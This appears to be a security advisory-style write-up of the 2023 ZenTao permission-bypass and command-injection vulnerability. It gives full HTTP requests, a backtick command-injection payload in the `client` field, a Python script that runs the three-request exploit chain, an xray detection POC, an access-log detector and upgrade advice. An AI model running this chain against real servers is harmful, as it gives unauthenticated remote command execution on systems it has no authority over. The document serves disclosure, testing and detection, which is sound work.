0x01 Vulnerability description
ZenTao (禅道) is the first open-source project management system developed in China and the most widely deployed one there. In early 2023 a command-execution vulnerability that was already being exploited in the wild was disclosed; the vendor shipped a fix on 2023-01-12. The root cause is a defect in ZenTao's permission checks: an unauthenticated attacker can obtain a session the application treats as authorised and then reach the repository module, whose edit handler passes the user-supplied `client` parameter into a shell command, so arbitrary commands run on the server.
0x02 Affected versions
Open-source edition:
unknown versions below 17.4 <= version <= 18.0.beta1
Ultimate edition (旗舰版):
unknown versions below 3.4 <= version <= 4.0.beta1
Enterprise edition (企业版):
unknown versions below 7.4 <= version <= 8.0.beta1
0x03 Environment setup
1. Manual install
Download from the official site.
Search for 18.0.beta1.
Open the entry and scroll straight to the bottom.
Choose the Linux one-click install package (reproduction on Windows ran into problems in testing).
After downloading, follow the installation documentation.
2. Docker
Two commands are enough:
docker pull easysoft/zentao:18.0.beta1
docker run --name zentao -d -p 8090:80 easysoft/zentao:18.0.beta1
Once the container is up, browse to http://ip:8090/ and run the installer.
The default database password is 123456.
After installation completes, the version number shown in the source confirms 18.0.beta1.
0x04 Reproduction
1. Activate a session cookie
Capture a request on the home page.
Change the path and the Cookie header. The cookie value does not need to come from a real login; any zentaosid in the same format works, but the same value must be reused in steps 2 and 3.
Path: /misc-captcha-user.html
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
A 200 with a normal page almost always means the target is affected. This request is the permission bypass: after it, the session behind that zentaosid is accepted by the repo module even though it never logged in.
2. Create a repository
Path: /repo-create.html
Request (the zentaosid shown is the author's; send the same value you used in step 1):
POST /repo-create.html HTTP/1.1
Host: your-ip
Content-Length: 113
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://your-ip
Referer: http://your-ip/zentao/repo-edit-1-0.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: zentaosid=984f74a56cc7ef44625511101014965c; lang=zh-cn; device=desktop; theme=default; tab=my; repoBranch=master; windowWidth=1187; windowHeight=658
Connection: close

product%5B%5D=22222&SCM=Gitlab&name=22222&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=aaa
"success" in the response means the repository was created.
3. Execute a command
Path: /repo-edit-10000-10000.html
POC (again, reuse the zentaosid from step 1; adjust Content-Length to the body you send):
POST /repo-edit-10000-10000.html HTTP/1.1
Host: your-ip
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://your-ip
Referer: http://your-ip/repo-edit-1-0.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: zentaosid=984f74a56cc7ef44625511101014965c; lang=zh-cn; device=desktop; theme=default; tab=my; repoBranch=master; windowWidth=1187; windowHeight=658
Connection: close

SCM=Subversion&client=`command to run`
With SCM=Subversion the `client` value (meant to be the path of the svn binary) is spliced into a shell command, so the backtick group runs first and its output ends up in the response. Using `id` as the command, a 200 response containing "uid=" confirms execution.
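The three steps above as one script. This is an added example, not code from the original post or from ZenTao; it encodes only what the steps show (the unauthenticated captcha request, the repo-create POST, and the repo-edit POST with a backtick-wrapped `client`). The repository name, the probe command `id`, and the default target URL are assumptions; the session id is a placeholder that all three requests share, because the first request is what makes the server accept it.

```python
"""Drive the three-request chain from the write-up against one target.

Added example: not code from the original post or from ZenTao. It only
encodes what the steps above show; the repository name "22222", the probe
command `id` and the default target URL are assumptions. Use it only against
instances you are authorised to test.
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

# Any well-formed zentaosid works: the first request is what makes the server
# accept this session id, so all three requests must send the same value.
SESSION_COOKIE = ("zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; "
                  "device=desktop; theme=default")
AJAX_HEADERS = {
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
}
ID_RE = re.compile(r"uid=\d+\([^)]*\)")


def build_chain(command: str, repo_name: str = "22222") -> list:
    """Return [(method, path, body)] in the order the write-up sends them.

    Pure function so the encoding can be checked without a live target."""
    create_body = urllib.parse.urlencode({
        "product[]": repo_name, "SCM": "Gitlab", "name": repo_name,
        "path": "", "encoding": "utf-8", "client": "", "account": "",
        "password": "", "encrypt": "base64", "desc": "aaa",
    })
    # Injection point: with SCM=Subversion the `client` value is spliced into a
    # shell command, so a backtick group runs whatever command we choose.
    edit_body = urllib.parse.urlencode({"SCM": "Subversion",
                                        "client": f"`{command}`"})
    return [
        ("GET", "/misc-captcha-user.html", None),
        ("POST", "/repo-create.html", create_body),
        ("POST", "/repo-edit-10000-10000.html", edit_body),
    ]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Treat 3xx as a result instead of following it: a redirect to the login
    page on step 1 is exactly the 'not affected' signal we want to observe."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def send(base_url: str, method: str, path: str, body: Optional[str]):
    """Send one request with the shared cookie; return (status, body_text)."""
    base = base_url.rstrip("/")
    req = urllib.request.Request(
        base + path,
        data=body.encode() if body is not None else None,
        method=method,
    )
    req.add_header("Cookie", SESSION_COOKIE)
    req.add_header("Referer", base + "/repo-edit-1-0.html")
    for name, value in AJAX_HEADERS.items():
        req.add_header(name, value)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx still carry a body
        return err.code, err.read().decode("utf-8", "replace")


def extract_id_output(body: str) -> Optional[str]:
    """Return the 'uid=N(name)' fragment if the response echoes `id` output."""
    match = ID_RE.search(body)
    return match.group(0) if match else None


def check(base_url: str) -> Optional[str]:
    """Walk the chain with `id` as the probe; return its output on success."""
    for method, path, body in build_chain("id"):
        status, text = send(base_url, method, path, body)
        if status != 200:
            return None  # e.g. step 1 redirected to login: patched target
        if path.startswith("/repo-edit-"):
            return extract_id_output(text)
    return None


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8090"
    output = check(target)
    print(f"[+] vulnerable: {output}" if output else "[-] chain did not complete")
```

Run it as `python3 zentao_check.py http://ip:8090`. Redirects are deliberately not followed: on a patched instance the first request is answered with a redirect to the login page rather than a 200, and the script stops there instead of sending the injection payload.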
0x05 POC for detection
An xray-style POC. The fixed zentaosid is shared by all three rules, which is what ties the activated session of rule 1 to the command execution in rule 3; rule 3 checks for "uid" from the `id` command.
params: []
name: ZenTao project management software command injection
set:
  referer: request.url
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
  r3: randomInt(100, 100000)
rules:
  - method: GET
    path: /misc-captcha-user.html
    headers:
      Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
    body: ""
    search: ""
    followredirects: false
    expression: response.status == 200
  - method: POST
    path: /repo-create.html
    headers:
      Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
      Referer: '{{referer}}/repo-edit-1-0.html'
      X-Requested-With: XMLHttpRequest
    body: product%5B%5D={{r3}}&SCM=Gitlab&name={{r3}}&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=
    search: ""
    followredirects: false
    expression: response.status == 200 && response.body.bcontains(bytes("success"))
  - method: POST
    path: /repo-edit-10000-10000.html
    headers:
      Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
      Referer: '{{referer}}/repo-edit-1-0.html'
      X-Requested-With: XMLHttpRequest
    body: SCM=Subversion&client=`id`
    search: ""
    followredirects: false
    expression: response.status == 200 && response.body.bcontains(bytes("uid"))
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
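The same three-request sequence the POC sends is what a defender can look for in web-server access logs. The following detector is an added example, not code from the original post or from ZenTao; it assumes the Nginx/Apache combined log format and that ZenTao is served at the site root, and the log lines in SAMPLE_LOG are constructed for illustration. Request bodies are not in access logs, so the backtick in `client` is invisible here; the signal is a repo-edit POST from an IP that fetched /misc-captcha-user.html shortly before.

```python
"""Flag the request sequence of the ZenTao repo command-injection chain in
web-server access logs.

Added example, not from the original post or from ZenTao. Assumes the
Nginx/Apache combined log format; SAMPLE_LOG is constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Optional

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
WINDOW = timedelta(minutes=5)

# Stage 1 is the permission bypass and stage 3 is where the command runs; the
# repo-create POST in between is recorded but not required, so a variant that
# skips it still alerts.
STAGES = (
    ("captcha", "GET", re.compile(r"^/misc-captcha-user\.html$")),
    ("create", "POST", re.compile(r"^/repo-create\.html$")),
    ("edit", "POST", re.compile(r"^/repo-edit-\d+-\d+\.html$")),
)

# Constructed sample: one attacker (203.0.113.7) running the chain, one
# ordinary user (198.51.100.9) editing a repository after a normal login.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2023:10:00:01 +0800] "GET /misc-captcha-user.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2023:10:00:02 +0800] "POST /repo-create.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2023:10:00:03 +0800] "POST /repo-edit-10000-10000.html HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jan/2023:10:05:00 +0800] "POST /user-login.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jan/2023:10:05:20 +0800] "POST /repo-edit-3-0.html HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop any query string
        "status": int(m["status"]),
    }


def stage_of(rec: dict) -> Optional[str]:
    """Map a parsed record to a chain stage name, or None if unrelated."""
    for name, method, pattern in STAGES:
        if rec["method"] == method and pattern.match(rec["path"]):
            return name
    return None


def find_chains(lines) -> list:
    """Return one alert per repo-edit POST preceded, from the same IP and
    within WINDOW, by the captcha request. Each alert notes whether the
    repo-create step was also seen in that window."""
    history = defaultdict(list)   # ip -> [(timestamp, stage)]
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        stage = stage_of(rec)
        if stage is None:
            continue
        if stage in ("captcha", "create"):
            history[rec["ip"]].append((rec["ts"], stage))
            continue
        recent = [s for t, s in history[rec["ip"]] if rec["ts"] - t <= WINDOW]
        if "captcha" in recent:
            alerts.append({
                "ip": rec["ip"],
                "edit_path": rec["path"],
                "edit_ts": rec["ts"],
                "create_seen": "create" in recent,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_chains(SAMPLE_LOG.splitlines()):
        print(alert)
```

A real user who is shown a login captcha also requests /misc-captcha-user.html, so on busy instances the rule should additionally require that no successful /user-login from that IP sits between the captcha request and the repo-edit POST, or be scoped to repo-edit IDs that do not exist in the database.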
0x06 Remediation
Open-source edition: upgrade to 18.0.beta2 or later;
Enterprise edition: upgrade to 8.0.beta2 or later;
Ultimate edition: upgrade to 4.0.beta2 or later.